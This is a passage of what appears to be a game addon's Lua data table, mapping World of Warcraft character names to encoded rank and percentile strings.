["Thune"] = "RB:418/57%EM:764/83%",
["Sparechange"] = "RM:235/54%",
["Trollnugent"] = "CM:140/12%",
["Losfris"] = "UB:257/33%UM:411/44%",
["Zesty"] = "RB:475/60%EM:892/92%",
["Bachiee"] = "RB:404/52%UM:409/41%",
["Stoness"] = "CM:121/12%",
["Thundamon"] = "UM:434/47%",
["Chakra"] = "CM:143/12%",
["Dencen"] = "CB:35/3%CM:72/6%",
["Kastar"] = "CM:27/0%",
["Pkunforgivin"] = "EM:705/77%",
["Hunnyboi"] = "RM:571/59%",
["Nabby"] = "CM:131/13%",
["Surf"] = "EB:652/85%EM:896/93%",
["Sharpwarrior"] = "RB:515/65%EM:716/76%",
["Allarolly"] = "CM:75/10%",
["Velwynna"] = "UB:310/39%RM:512/54%",
["Dilonn"] = "RM:630/69%",
["Hoobangin"] = "CM:221/22%",
["Satrap"] = "EM:739/80%",
["Blitzklown"] = "RM:704/73%",
["Diggs"] = "UB:268/33%UM:348/35%",
["Shadowlands"] = "EB:681/87%EM:890/91%",
["Biglips"] = "CM:30/1%",
["Sulomon"] = "CM:156/15%",
["Moolana"] = "UM:321/33%",
["Amoodon"] = "RB:581/74%EM:729/77%",
["Stylès"] = "ET:635/84%EB:736/93%EM:919/93%",
["Myfavoritguy"] = "RM:470/73%",
["Yexin"] = "RB:540/69%RM:494/52%",
["Fendou"] = "CM:63/10%",
["Nafertari"] = "CB:192/23%RM:502/53%",
["Roninone"] = "UB:327/41%EM:707/75%",
["Andreana"] = "EB:700/94%EM:846/90%",
["Darkchris"] = "CM:185/17%",
["Andychena"] = "RB:416/57%RM:569/63%",
["Deadk"] = "CM:103/9%",
["Uwot"] = "EB:499/76%RM:365/55%",
["Spaghettius"] = "CB:180/21%UM:376/39%",
["Donkslayer"] = "UM:245/25%",
["Zaie"] = "EB:645/84%EM:797/85%",
["Verdandi"] = "UB:366/49%UM:407/44%",
["Holyblindman"] = "CB:56/4%RM:338/60%",
["Cvx"] = "ET:613/80%EB:671/86%RM:555/61%",
["Jaylun"] = "CB:162/21%RM:493/55%",
["Stealthfish"] = "CB:195/23%UM:428/45%",
["Hiall"] = "CB:49/5%EM:845/89%",
["Geight"] = "CM:245/23%",
["Nyxo"] = "RB:495/63%EM:840/82%",
["Meditate"] = "RB:391/53%EM:734/80%",
["Sease"] = "EB:619/84%EM:760/82%",
["Frðsty"] = "CB:35/3%CM:64/5%",
["Wangchungus"] = "RB:491/68%EM:740/81%",
["Lacroixcan"] = "RT:493/66%LB:750/95%EM:832/88%",
["Feydrautha"] = "CB:59/13%RM:285/63%",
["Stylebend"] = "RB:425/52%RM:480/50%",
["Nolte"] = "CB:72/8%UM:392/42%",
["Mealsonwheel"] = "CM:145/13%",
["Vuduhunter"] = "RB:525/71%RM:647/62%",
["Sif"] = "UB:282/36%RM:620/68%",
["Nítríss"] = "RB:450/59%RM:660/72%",
["Stroll"] = "UB:304/38%RM:518/54%",
["Myneegz"] = "LT:425/95%EB:727/94%EM:784/90%",
["Beeb"] = "UB:318/39%RM:690/73%",
["Kusabe"] = "UB:299/36%RM:628/67%",
["Stubb"] = "EB:692/92%EM:785/84%",
["Nseeker"] = "LB:767/96%EM:922/94%",
["Fuser"] = "EB:683/88%EM:869/91%",
["Porco"] = "UB:138/45%RM:184/52%",
["Cartolo"] = "EB:734/93%EM:868/91%",
["Cptnmarvel"] = "CB:42/3%RM:481/53%",
["Whitegive"] = "RM:477/69%",
["Fnightingale"] = "UM:348/37%",
["Levalol"] = "EB:648/82%EM:753/79%",
["Gimozzi"] = "EB:670/84%EM:891/91%",
["Knuckls"] = "EB:693/87%LM:940/95%",
["Xennzo"] = "LB:778/97%LM:948/96%",
["Yoojin"] = "RB:540/72%RM:665/73%",
["Muffinhealz"] = "RB:506/70%UM:313/32%",
["Vexros"] = "UM:440/48%",
["Silf"] = "CM:219/20%",
["Jlnn"] = "UB:106/49%RM:566/59%",
["Donn"] = "RB:318/56%EM:654/82%",
["Groyped"] = "CM:146/13%",
["Kwafty"] = "CB:127/15%RM:528/58%",
["Troubledmoon"] = "RM:453/50%",
["Ahrioch"] = "CM:87/8%",
["Kiralean"] = "CB:61/6%",
["Res"] = "EB:581/81%EM:802/87%",
["Xforce"] = "EB:745/93%LM:937/95%",
["Soldaddy"] = "CB:138/17%EM:717/76%",
["Dakkin"] = "RB:406/52%EM:728/77%",
["Ginsburg"] = "EB:570/85%EM:745/89%",
["Melersi"] = "RM:593/65%",
["Jijijuda"] = "CB:174/22%UM:260/26%",
["Istinn"] = "RB:418/54%EM:864/87%",
["Lzdies"] = "EB:751/94%EM:910/93%",
["Shinsham"] = "RB:376/64%EM:713/85%",
["Coolstorybro"] = "CM:211/21%",
["Ninjaloots"] = "UB:298/37%RM:634/66%",
["Sadpuppy"] = "UB:333/42%RM:660/68%",
["Yjason"] = "RB:493/68%RM:511/59%",
["Sesul"] = "CB:93/11%UM:446/47%",
["Hellomummy"] = "RM:594/65%",
["Belligerent"] = "EB:650/89%LM:949/97%",
["Ucox"] = "CM:54/4%",
["Munkusleep"] = "CB:40/4%CM:190/18%",
["Gweef"] = "EB:700/92%EM:808/86%",
["Bitelidaz"] = "CB:91/10%CM:230/23%",
["Smiteoholic"] = "RB:392/53%EM:695/75%",
["Imawarrior"] = "CM:54/7%",
["Uwantbuydvd"] = "RB:210/54%EM:758/82%",
["Kinrinarmor"] = "CM:54/4%",
["Lastsamurai"] = "UM:337/35%",
["Brown"] = "CB:136/17%EM:831/83%",
["Nemesistwm"] = "CM:37/5%",
["Gogobobo"] = "RB:382/52%RM:608/67%",
["Slossed"] = "EB:613/80%EM:909/93%",
["Wojak"] = "RB:439/57%UM:422/43%",
["Diirtymike"] = "CM:32/1%",
["Dovakkin"] = "RB:561/71%EM:902/90%",
["Skeletorn"] = "CB:56/4%RM:584/65%",
["Richmage"] = "RB:532/71%EM:789/84%",
["Venomouse"] = "EB:627/80%EM:883/90%",
["Zartyn"] = "CB:35/6%RM:511/54%",
["Donalbur"] = "CM:122/11%",
["Bladestorm"] = "UT:357/49%RB:510/67%EM:760/80%",
["Runecraft"] = "EB:699/89%EM:754/79%",
["Shashashmoo"] = "UB:318/42%RM:619/69%",
["Qdaddy"] = "RB:474/60%EM:872/86%",
["Wupower"] = "RB:565/72%EM:840/87%",
["Obaybull"] = "UB:281/35%RM:724/70%",
["Kebobmaster"] = "EB:608/77%RM:628/67%",
["Dogoww"] = "RB:495/65%RM:598/64%",
["Rockdog"] = "CB:74/6%CM:141/12%",
["Idoru"] = "EB:588/84%EM:708/84%",
["Mcmagius"] = "CB:113/13%EM:821/83%",
["Usernaem"] = "EM:662/84%",
["Deepblu"] = "RB:450/59%RM:500/52%",
["Confirmed"] = "EM:632/80%",
["Dcupstreamer"] = "EB:617/78%EM:892/91%",
["Safarmu"] = "UB:197/25%RM:536/59%",
["Tonnerre"] = "EB:668/90%EM:751/82%",
["Kimjõngheal"] = "UB:317/42%RM:457/50%",
["Boliggo"] = "CB:143/17%RM:485/51%",
["Evilboy"] = "CB:91/11%CM:202/20%",
["Garrin"] = "CM:236/24%",
["Badwarrior"] = "UB:260/28%UM:265/26%",
["Samona"] = "EM:683/75%",
["Sanik"] = "EB:696/89%LM:957/97%",
["Undeadshaman"] = "CM:109/9%",
["Brutallegend"] = "RB:525/67%EM:854/88%",
["Tuxor"] = "UB:292/36%UM:268/26%",
["Bloodrain"] = "CM:145/13%",
["Goinham"] = "RB:493/65%RM:521/57%",
["Sosaforprez"] = "UM:364/38%",
["Battledemon"] = "EB:724/91%LM:946/95%",
["Nottlol"] = "SB:799/99%EM:921/94%",
["Scissors"] = "LB:788/98%LM:961/97%",
["Demon"] = "LB:773/97%LM:983/98%",
["Bloodsurgë"] = "EB:624/82%RM:660/72%",
["Jayone"] = "UB:334/43%RM:504/55%",
["Yunogasai"] = "UB:347/45%UM:434/47%",
["Animalized"] = "UM:265/27%",
["Larcatta"] = "EB:675/94%EM:788/92%",
["Kuángniu"] = "RB:510/70%EM:860/91%",
["Kuangmaofeng"] = "RB:504/64%EM:832/86%",
["Longinusnb"] = "UB:258/33%EM:741/80%",
["Ozzyamon"] = "UB:310/35%EM:577/77%",
["Alight"] = "RM:498/54%",
["Jarizard"] = "UM:346/36%",
["Miscreation"] = "EB:656/85%EM:884/92%",
["Toladun"] = "CM:116/9%",
["Puremoist"] = "UB:285/37%EM:710/78%",
["Totemation"] = "UM:380/40%",
["Homeslyce"] = "EB:651/84%EM:724/75%",
["Killmage"] = "CM:191/18%",
["Aenl"] = "RB:575/74%EM:888/91%",
["Vune"] = "CB:151/16%RM:323/63%",
["Whìrlwìnd"] = "RB:413/50%RM:657/70%",
["Fatjazz"] = "EB:597/78%RM:575/59%",
["Anteroz"] = "RB:491/68%EM:813/88%",
["Sinistér"] = "RM:553/59%",
["Limo"] = "UM:229/32%",
["Sakiri"] = "EB:470/79%EM:660/83%",
["Tomviolence"] = "EB:631/81%EM:746/78%",
["Wargrim"] = "EB:692/92%EM:892/93%",
["Frex"] = "CM:28/0%",
["Swen"] = "UB:269/34%UM:318/33%",
["Legashi"] = "RB:574/73%EM:818/84%",
["Blitzzkrieg"] = "UB:302/38%UM:451/46%",
["Kindaslaps"] = "RB:558/71%EM:910/92%",
["Schmurtz"] = "EB:657/84%EM:791/82%",
["Etheris"] = "EB:468/75%EM:735/86%",
["Selveins"] = "CB:102/12%",
["Olmek"] = "CB:118/13%CM:69/5%",
["Ujee"] = "RM:208/53%",
["Barja"] = "RB:535/70%RM:682/72%",
["Lilmike"] = "UM:287/29%",
["Goochee"] = "UB:315/40%UM:389/39%",
["Nightmare"] = "RB:519/67%EM:743/78%",
["Lisatai"] = "UM:276/26%",
["Flitwitch"] = "EB:747/94%EM:839/87%",
["Frolic"] = "EM:915/93%",
["Salvdali"] = "LB:771/97%SM:1008/99%",
["Oreoz"] = "CM:150/14%",
["Alluencewoot"] = "UB:201/25%UM:300/30%",
["Norne"] = "CM:40/5%",
["Bosstop"] = "RB:508/67%EM:746/80%",
["Bm"] = "CB:89/10%CM:257/24%",
["Guhnoblin"] = "UB:333/43%EM:720/78%",
["Smokechaos"] = "RB:528/67%RM:673/72%",
["Gankgodx"] = "EB:609/84%EM:724/86%",
["Kirtsyylocks"] = "CM:58/5%",
["Xoxo"] = "EB:706/89%LM:938/95%",
["Icebear"] = "RB:426/52%RM:671/72%",
["Attribute"] = "RM:216/50%",
["Ian"] = "EB:739/93%LM:954/96%",
["Tinkly"] = "UB:233/31%RM:553/61%",
["Estildith"] = "EB:702/94%LM:940/97%",
["Jimmydean"] = "EB:704/88%LM:961/97%",
["Blankies"] = "UM:253/29%",
["Sunnycafe"] = "CB:48/5%UM:284/29%",
["Burnsiex"] = "EB:725/91%SM:1003/99%",
["Frostarmor"] = "EB:631/83%RM:530/58%",
["Eeto"] = "EB:681/86%LM:951/96%",
["Peyote"] = "UB:218/28%RM:405/59%",
["Coksmootch"] = "RB:495/64%RM:701/74%",
["Hepatitus"] = "RB:534/68%EM:736/78%",
["Willardm"] = "CB:27/0%UM:317/31%",
["Hengda"] = "RB:520/68%RM:701/74%",
["Fysk"] = "EB:692/89%LM:932/95%",
["Octah"] = "CB:29/1%CM:101/8%",
["Fosho"] = "EB:599/82%EM:826/88%",
["Dinick"] = "RB:472/65%EM:790/84%",
["Dyra"] = "LT:789/98%LB:773/97%LM:986/98%",
["Anamoly"] = "EB:540/75%EM:835/88%",
["Dittmer"] = "EB:692/87%EM:888/91%",
["Wootiez"] = "EB:712/89%EM:896/91%",
["Kinzae"] = "UM:263/31%",
["Madpast"] = "EM:514/75%",
["Eveelor"] = "UB:229/28%LM:954/97%",
["Stoniee"] = "CB:66/7%CM:111/13%",
["Mypal"] = "EB:599/78%RM:663/70%",
["Unborn"] = "UM:201/38%",
["Alchemeia"] = "EB:578/80%EM:799/87%",
["Florìdaman"] = "LB:785/98%LM:986/98%",
["Cuddlesxo"] = "LB:795/98%SM:1017/99%",
["Manunder"] = "CM:180/17%",
["Tiehanhan"] = "RT:425/58%EB:581/76%EM:715/78%",
["Cocoatale"] = "CB:67/7%EM:726/79%",
["Vaemor"] = "EM:736/80%",
["Anomaley"] = "EB:720/91%EM:760/79%",
["Arah"] = "UB:209/25%EM:788/83%",
["Odysseus"] = "EB:661/93%LM:696/95%",
["Manuredps"] = "RM:536/57%",
["Eastere"] = "CB:29/0%CM:227/22%",
["Rhaine"] = "EB:600/83%SM:983/99%",
["Imagi"] = "UM:370/39%",
["Ramosity"] = "UB:201/25%RM:613/65%",
["Cleaving"] = "RM:633/68%",
["Fíghtmilk"] = "EB:666/90%RM:534/59%",
["Theaccuser"] = "CB:229/24%RM:415/63%",
["Jackman"] = "EB:597/78%EM:775/81%",
["Rofldin"] = "EB:696/93%LM:915/95%",
["Glitterwizrd"] = "CB:47/4%",
["Kooper"] = "RB:421/52%EM:774/88%",
["Stargazér"] = "RB:455/62%EM:791/86%",
["Wender"] = "EB:638/87%EM:892/94%",
["Bamm"] = "RB:508/70%RM:669/74%",
["Hazbit"] = "EM:822/86%",
["Gomvely"] = "RB:405/55%EM:746/82%",
["Hugenerd"] = "EB:585/77%RM:487/54%",
["Azazielle"] = "UB:305/38%RM:512/52%",
["Beeferz"] = "RM:463/70%",
["Doublehp"] = "UB:351/46%EM:717/78%",
["Shangtsung"] = "RM:312/50%",
["Thegropa"] = "RB:466/64%RM:564/62%",
["Dispo"] = "EB:732/92%EM:928/94%",
["Salara"] = "SM:982/99%",
["Cobaine"] = "RM:633/67%",
["Messica"] = "EB:570/78%LM:933/96%",
["Nuggernaut"] = "EB:566/80%EM:703/85%",
["Sangalor"] = "RM:502/55%",
["Bigdus"] = "CB:98/11%RM:559/60%",
["Tocuteforu"] = "EM:639/78%",
["Bigbadwes"] = "CT:108/13%RB:534/70%EM:769/81%",
["Meness"] = "EB:640/88%EM:726/80%",
["Shinukishin"] = "RB:513/65%EM:817/85%",
["Dymisquishy"] = "UM:349/37%",
["Cbr"] = "CM:26/0%",
["Papahustle"] = "RB:409/56%EM:732/80%",
["Kaneohe"] = "CB:31/2%CM:192/18%",
["Iceolated"] = "CM:29/1%",
["Slicydicy"] = "CB:141/17%UM:415/43%",
["Blokletics"] = "RM:655/72%",
["Dogboygirl"] = "CM:168/16%",
["Peterboyle"] = "CM:188/18%",
["Warbeerr"] = "UB:80/38%RM:260/59%",
["Veleen"] = "CB:43/4%UM:361/38%",
["Ouchmybones"] = "RB:460/59%EM:831/86%",
["Hotrocks"] = "UM:267/30%",
["Klonks"] = "UB:214/49%RM:461/53%",
["Dianabol"] = "CB:37/3%RM:588/61%",
["Dispoh"] = "EB:559/77%EM:823/88%",
["Mentorzq"] = "UM:439/44%",
["Biggholyfour"] = "RB:448/61%RM:631/69%",
["Kissfate"] = "CM:30/1%",
["Mastablaster"] = "CM:146/13%",
["Scrufy"] = "CB:74/8%RM:595/66%",
["Baesong"] = "RM:499/71%",
["Cessassion"] = "RM:545/58%",
["Ellepriest"] = "CM:76/5%",
["Wafflemini"] = "LB:759/95%EM:861/89%",
["Gabbo"] = "UM:337/36%",
["Weebpriest"] = "EB:589/82%EM:839/90%",
["Slumwawa"] = "LB:792/98%SM:1000/99%",
["Torakur"] = "UM:380/39%",
["Darktotems"] = "UM:324/33%",
["Eaturmouth"] = "RB:498/63%",
["Jenkum"] = "UB:209/26%RM:480/51%",
["Alvarisle"] = "LB:754/95%LM:985/98%",
["Xiyelii"] = "RB:492/64%RM:629/65%",
["Thornhad"] = "UB:223/27%EM:810/84%",
["Lherzolite"] = "UM:409/44%",
["Sippinrich"] = "CM:123/11%",
["Tickdahunt"] = "CM:112/10%",
["Deathvolt"] = "UM:269/26%",
["Farnk"] = "RB:390/67%EM:612/79%",
["Devyce"] = "EB:670/87%EM:843/89%",
["Hardroad"] = "RB:566/72%EM:773/81%",
["Mistahpooley"] = "RB:461/59%RM:532/57%",
["Wahahaa"] = "EB:669/87%EM:759/82%",
["Igotwood"] = "UB:348/46%EM:683/75%",
["Povertymage"] = "RB:520/68%RM:629/65%",
["Psy"] = "EB:642/81%EM:798/83%",
["Retrogaijin"] = "UM:264/27%",
["Loltrickedu"] = "EB:634/80%EM:819/85%",
["Mordancy"] = "UB:391/47%RM:544/58%",
["Phoenixgrey"] = "UB:233/29%CM:243/24%",
["Triash"] = "EB:646/83%EM:800/83%",
["Parishealtin"] = "RB:486/67%RM:661/73%",
["Jmoredots"] = "RB:421/54%UM:466/47%",
["Gbabygrim"] = "EB:685/87%EM:876/90%",
["Armothy"] = "RB:482/61%EM:782/75%",
["Tildos"] = "CB:34/1%CM:81/6%",
["Mcfugleworth"] = "CM:94/7%",
["Moosé"] = "EM:796/85%",
["Dirtdiver"] = "CM:122/11%",
["Furbi"] = "UM:321/33%",
["Tanksobama"] = "CB:28/2%UM:265/48%",
["Riplol"] = "CM:79/7%",
["Polymorphs"] = "EB:622/82%EM:818/87%",
["Inkin"] = "RB:431/56%RM:530/54%",
["Stabitha"] = "RB:448/57%RM:672/71%",
["Bbqgumdrop"] = "UB:244/30%CM:225/22%",
["Warmaker"] = "RB:573/73%RM:602/64%",
["Gailshero"] = "CB:177/18%RM:443/66%",
["Roque"] = "CB:66/7%RM:682/72%",
["Vealcutlet"] = "CM:187/17%",
["Supbro"] = "CB:179/19%RM:533/57%",
["Tonepatron"] = "ET:556/91%EB:360/75%EM:776/91%",
["Jedediah"] = "UB:372/46%EM:740/78%",
["Magecul"] = "RB:458/61%EM:759/82%",
["Alsa"] = "RB:459/60%EM:718/76%",
["Maizzee"] = "EB:562/78%EM:793/86%",
["Killwill"] = "CB:29/1%RM:542/74%",
["Gøose"] = "EB:635/86%EM:899/94%",
["Yarkblo"] = "EB:674/90%EM:900/93%",
["Døgtamer"] = "ET:616/81%LB:796/98%LM:983/98%",
["Magesmaximus"] = "RB:461/61%RM:629/69%",
["Gigaboom"] = "EB:684/93%EM:714/78%",
["Brokenhelix"] = "LB:723/95%EM:877/94%",
["Stoneybrown"] = "RB:482/66%EM:791/86%",
["Anulprolapse"] = "CB:187/22%RM:634/68%",
["Notabank"] = "UB:303/34%RM:673/72%",
["Populargirl"] = "EB:649/82%EM:770/80%",
["Meijian"] = "UB:282/35%UM:365/36%",
["Pitunia"] = "EB:536/83%EM:766/88%",
["Biiggs"] = "EB:626/82%LM:990/98%",
["Dreamred"] = "RM:516/72%",
["Harace"] = "EB:726/92%EM:828/88%",
["Faarquad"] = "CB:87/10%UM:417/44%",
["Spinshot"] = "EM:723/76%",
["Zhiyu"] = "RM:430/71%",
["Moonmon"] = "RB:474/60%EM:703/75%",
["Imsocool"] = "EB:673/90%EM:845/89%",
["Feihongzhiwa"] = "RB:561/74%EM:706/75%",
["Dexterious"] = "RB:544/70%EM:754/79%",
["Noobwarlock"] = "RB:546/72%EM:819/87%",
["Oldgate"] = "RM:498/54%",
["Icebanana"] = "UM:393/41%",
["Littletrump"] = "UM:287/29%",
["Vonbraun"] = "LB:766/96%EM:914/93%",
["Magis"] = "EB:651/85%EM:901/93%",
["Nameless"] = "EB:623/79%EM:757/79%",
["Hobohan"] = "EB:681/92%LM:904/95%",
["Zakharov"] = "RB:519/66%EM:743/78%",
["Gidhon"] = "EB:670/89%EM:846/92%",
["Rapmusic"] = "CB:153/16%UM:347/35%",
["Emperious"] = "CM:175/18%",
["Cantsí"] = "RB:291/68%RM:623/69%",
["Honataurs"] = "RM:348/57%",
["Foxcatcher"] = "RM:422/70%",
["Vepuzar"] = "EB:620/79%EM:892/89%",
["Razuki"] = "EB:603/77%EM:903/90%",
["Flyingapsar"] = "RB:452/60%EM:709/77%",
["Arkhän"] = "CM:142/14%",
["Frostygimp"] = "CB:147/17%CM:12/18%",
["Kutta"] = "RB:473/60%EM:838/86%",
["Nattyice"] = "RB:401/50%EM:893/91%",
["Blaer"] = "CB:177/21%CM:233/23%",
["Jufhuntress"] = "UB:298/37%UM:467/48%",
["Displacer"] = "UB:271/33%EM:718/76%",
["Rajere"] = "CT:181/23%RB:402/53%RM:617/66%",
["Bensilis"] = "EB:700/88%LM:972/97%",
["Lunchbox"] = "EB:613/78%RM:572/61%",
["Riplin"] = "RB:251/61%RM:374/72%",
["Cocoball"] = "EB:603/77%RM:614/66%",
["Subier"] = "RM:697/74%",
["Strangerthng"] = "CM:221/21%",
["Armlessjose"] = "EB:520/76%EM:733/86%",
["Kabewm"] = "UM:347/34%",
["Lickfeet"] = "RB:468/64%EM:826/86%",
["Wotzz"] = "EB:600/82%LM:910/95%",
["Grandmabear"] = "EB:580/76%EM:799/83%",
["Magiccactus"] = "UM:351/38%",
["Alcohaulin"] = "EM:752/79%",
["Weedfury"] = "UB:221/28%UM:350/36%",
["Otirrub"] = "UB:367/47%EM:747/79%",
["Oongabunga"] = "UB:323/37%UM:398/41%",
["Puri"] = "EB:661/86%EM:775/83%",
["Blessbeard"] = "EB:699/93%EM:789/85%",
["Karrak"] = "UB:91/34%RM:564/72%",
["Madmann"] = "RM:540/58%",
["Zoeyent"] = "UM:473/49%",
["Aitaka"] = "UB:313/39%UM:425/44%",
["Andios"] = "CB:76/9%CM:140/12%",
["Expresso"] = "UB:216/27%EM:763/80%",
["Methblade"] = "RB:521/67%EM:785/82%",
["Rae"] = "RB:414/56%EM:801/85%",
["Arthasao"] = "RT:494/67%RB:565/74%EM:693/76%",
["Rabies"] = "SB:788/99%LM:964/98%",
["Dramuh"] = "UB:212/26%",
["Frankedoodle"] = "RB:415/56%CM:214/20%",
["Tankitbare"] = "RM:225/56%",
["Meatsauceboy"] = "CM:2/2%",
["Bootyslapp"] = "CB:179/21%UM:274/28%",
["Hippiesabo"] = "RM:432/51%",
["Themat"] = "EB:610/77%EM:735/78%",
["Lahfiel"] = "CB:157/19%UM:317/33%",
["Farmers"] = "CB:64/5%UM:365/45%",
["Mishapapa"] = "EB:685/87%EM:787/82%",
["Kalaharu"] = "RB:516/66%EM:812/84%",
["Plainsrunner"] = "UM:308/32%",
["Mòridin"] = "CM:127/13%",
["Asuná"] = "UB:340/42%RM:472/50%",
["Nugology"] = "UM:463/48%",
["Treeligion"] = "EB:495/79%EM:702/85%",
["Jahbroni"] = "CM:197/19%",
["Morium"] = "LB:753/95%LM:968/97%",
["Gaymanx"] = "EB:688/88%EM:810/84%",
["Dotgu"] = "RB:553/71%EM:764/80%",
["Instagramhoe"] = "EB:652/89%EM:712/78%",
["Woshiniba"] = "UM:268/27%",
["Demonx"] = "RB:579/74%EM:710/85%",
["Saauuce"] = "LB:754/96%LM:889/96%",
["Guinefort"] = "UB:234/29%LM:916/95%",
["Lommy"] = "RB:511/68%RM:639/70%",
["Wumberticus"] = "UB:320/43%RM:485/71%",
["Gisildor"] = "EB:564/78%RM:572/64%",
["Brogurt"] = "RB:430/55%RM:657/70%",
["Bengrips"] = "RB:494/62%EM:752/79%",
["Cray"] = "EB:735/94%LM:962/98%",
["Ronnthedonn"] = "RM:653/72%",
["Wonder"] = "CB:149/18%RM:475/50%",
["Boocieliquor"] = "RB:420/51%UM:471/49%",
["Drakhal"] = "RB:436/60%RM:570/63%",
["Knooty"] = "UB:223/28%RM:519/57%",
["Cerulean"] = "UB:267/34%RM:492/54%",
["Felswrath"] = "RB:466/61%RM:703/73%",
["Shashx"] = "UB:327/40%EM:792/82%",
["Chazik"] = "RB:536/68%EM:924/92%",
["Redzovic"] = "UB:323/40%UM:278/28%",
["Healzjkhoj"] = "EB:625/86%EM:898/94%",
["Hugetestes"] = "CM:216/22%",
["Talrend"] = "RM:396/62%",
["Zmonster"] = "CB:54/5%RM:533/52%",
["Meshben"] = "LB:777/98%LM:956/97%",
["Sociø"] = "CB:139/17%RM:507/56%",
["Tonathan"] = "RM:483/53%",
["Coltrane"] = "LB:736/96%LM:950/97%",
["Fullcontrola"] = "UM:303/31%",
["Leronn"] = "CB:118/14%RM:573/63%",
["Kwaftyyz"] = "UB:64/43%CM:118/10%",
["Dago"] = "EB:707/90%EM:930/94%",
["Uggh"] = "CB:64/7%UM:270/27%",
["Wizzkid"] = "UM:288/29%",
["Shêkky"] = "CB:186/22%RM:610/65%",
["Rengall"] = "UB:389/47%UM:370/37%",
["Pater"] = "CB:64/7%CM:124/12%",
["Uggznsnuggz"] = "LB:776/97%LM:955/97%",
["Bokunogoku"] = "EB:596/82%EM:900/94%",
["Lavamepls"] = "EB:625/85%EM:875/91%",
["Bighaircut"] = "CM:226/22%",
["Lunarclaw"] = "RB:355/71%EM:767/91%",
["Sawdamizer"] = "CB:205/22%RM:609/65%",
["Greatgambino"] = "EB:567/78%EM:915/94%",
["Delumicus"] = "RM:443/71%",
["Fairyduster"] = "CM:217/22%",
["Rhoz"] = "SB:830/99%SM:1068/99%",
["Rïpkobe"] = "RM:303/52%",
["Girldwarf"] = "EB:727/92%EM:917/93%",
["Zebgor"] = "CM:223/22%",
["Chickenhead"] = "EB:489/80%EM:734/86%",
["Jaiide"] = "RM:517/56%",
["Khadabra"] = "CM:93/8%",
["Sherby"] = "EB:714/90%EM:890/91%",
["Jimmypsthree"] = "RM:658/68%",
["Icehead"] = "LB:764/96%LM:958/96%",
["Ahunter"] = "EB:701/89%EM:937/94%",
["Winwin"] = "CM:201/19%",
["Gigalord"] = "EB:694/93%EM:797/86%",
["Minithor"] = "EB:735/92%EM:894/92%",
["Deathsdeal"] = "UB:364/49%RM:575/64%",
["Evildictator"] = "EB:722/93%EM:885/94%",
["Krazydotz"] = "UB:328/41%EM:768/76%",
["Karmac"] = "RB:505/65%RM:674/72%",
["Toctick"] = "EB:649/85%EM:877/91%",
["Woze"] = "CB:29/1%CM:206/19%",
["Wheytoobaked"] = "EB:683/87%EM:893/92%",
["Darkslight"] = "RB:521/72%EM:736/81%",
["Bestgirl"] = "CB:52/5%RM:589/65%",
["Kramit"] = "UB:123/38%UM:263/46%",
["Cric"] = "RB:483/62%EM:862/88%",
["Baslo"] = "CB:27/1%CM:99/8%",
["Micros"] = "CM:79/7%",
["Akasana"] = "RB:436/54%EM:707/85%",
["Gachihop"] = "UM:323/33%",
["Doogarr"] = "CM:133/11%",
["Zuula"] = "CB:163/20%EM:769/83%",
["Shwang"] = "CB:65/7%UM:455/47%",
["Hocuspocusmf"] = "EB:674/86%EM:884/91%",
["Mosatch"] = "EB:615/80%EM:793/83%",
["Unstoppable"] = "EB:744/94%LM:977/98%",
["Shamarky"] = "CM:62/5%",
["Nofail"] = "UM:272/26%",
["Zwarly"] = "EB:597/82%EM:836/88%",
["Rorrior"] = "UB:396/48%RM:536/73%",
["Flitwicked"] = "UB:310/40%CM:227/22%",
["Neat"] = "UM:410/43%",
["Dibbletiki"] = "RB:414/54%RM:524/57%",
["Sultan"] = "EB:638/81%EM:901/92%",
["Qbic"] = "EB:642/81%EM:922/94%",
["Deluxe"] = "RB:481/67%EM:767/83%",
["Djstabby"] = "RB:499/64%EM:785/82%",
["Cannabìs"] = "RB:490/68%EM:720/79%",
["Moovinalong"] = "CM:64/8%",
["Moistfeet"] = "UB:206/25%RM:510/52%",
["Falange"] = "EB:605/77%RM:644/69%",
["Visenyia"] = "CM:155/14%",
["Kynesorge"] = "EB:736/93%EM:827/86%",
["Ziwaka"] = "CM:184/17%",
["Tequilita"] = "RB:407/55%EM:844/89%",
["Ggluckk"] = "EB:596/83%EM:817/88%",
["Siknasty"] = "LB:766/96%LM:953/97%",
["Manimul"] = "EB:683/86%EM:924/92%",
["Mansplainer"] = "RB:432/53%RM:565/60%",
["Laciénega"] = "CB:112/14%UM:260/26%",
["Skymasters"] = "RM:279/57%",
["Violon"] = "RB:440/57%RM:667/69%",
["Uvic"] = "UB:268/33%RM:619/66%",
["Antilove"] = "CB:143/16%RM:362/62%",
["Fendii"] = "RB:484/62%EM:866/89%",
["Chillsome"] = "RB:427/56%RM:492/54%",
["Treos"] = "CB:44/4%",
["Chiya"] = "RB:450/62%EM:522/76%",
["Deathgasm"] = "RB:526/69%EM:759/79%",
["Christo"] = "EB:597/83%EM:838/90%",
["Roknahr"] = "EB:539/75%EM:768/84%",
["Salmond"] = "RB:415/74%RM:486/74%",
["Lildummy"] = "RM:353/57%",
["Meco"] = "EB:708/90%EM:834/83%",
["Ycarry"] = "CM:54/4%",
["Hotstuff"] = "RB:541/72%EM:829/84%",
["Issari"] = "RB:483/63%RM:549/58%",
["Magimoody"] = "UM:334/35%",
["Spectrah"] = "RB:462/59%EM:714/75%",
["Theson"] = "EB:510/78%RM:545/71%",
["Sluggin"] = "UB:207/25%RM:491/54%",
["Lothstrader"] = "RM:563/60%",
["Shankz"] = "UM:264/27%",
["Highlite"] = "CB:90/8%EM:704/80%",
["Frostbite"] = "LB:750/95%LM:970/97%",
["Delk"] = "EB:650/90%LM:910/96%",
["Vuka"] = "UM:365/38%",
["Khanjar"] = "CB:34/3%CM:153/15%",
["Trumpwinner"] = "CB:26/0%UM:333/35%",
["Farmzy"] = "EM:690/75%",
["Turid"] = "CB:66/5%UM:422/45%",
["Zaturos"] = "CB:157/17%RM:479/52%",
["Arlite"] = "CB:75/8%UM:466/48%",
["Pubez"] = "UM:338/35%",
["Cutemonday"] = "UT:242/47%EB:586/82%EM:626/80%",
["Aensthus"] = "CM:177/16%",
["Romeoblues"] = "CM:36/2%",
["Agalu"] = "RB:503/64%RM:662/70%",
["Dakar"] = "RT:464/64%RB:478/63%EM:881/90%",
["Mcgraw"] = "UM:374/40%",
["Cokekiller"] = "RB:458/58%EM:833/86%",
["Spitzbube"] = "CB:28/1%RM:502/53%",
["Depredation"] = "CB:180/22%UM:383/41%",
["Deathdivine"] = "CB:95/10%CM:90/8%",
["Nevurt"] = "RB:464/59%EM:729/77%",
["Ecarlate"] = "UB:333/41%EM:877/90%",
["Sushisushi"] = "RM:333/69%",
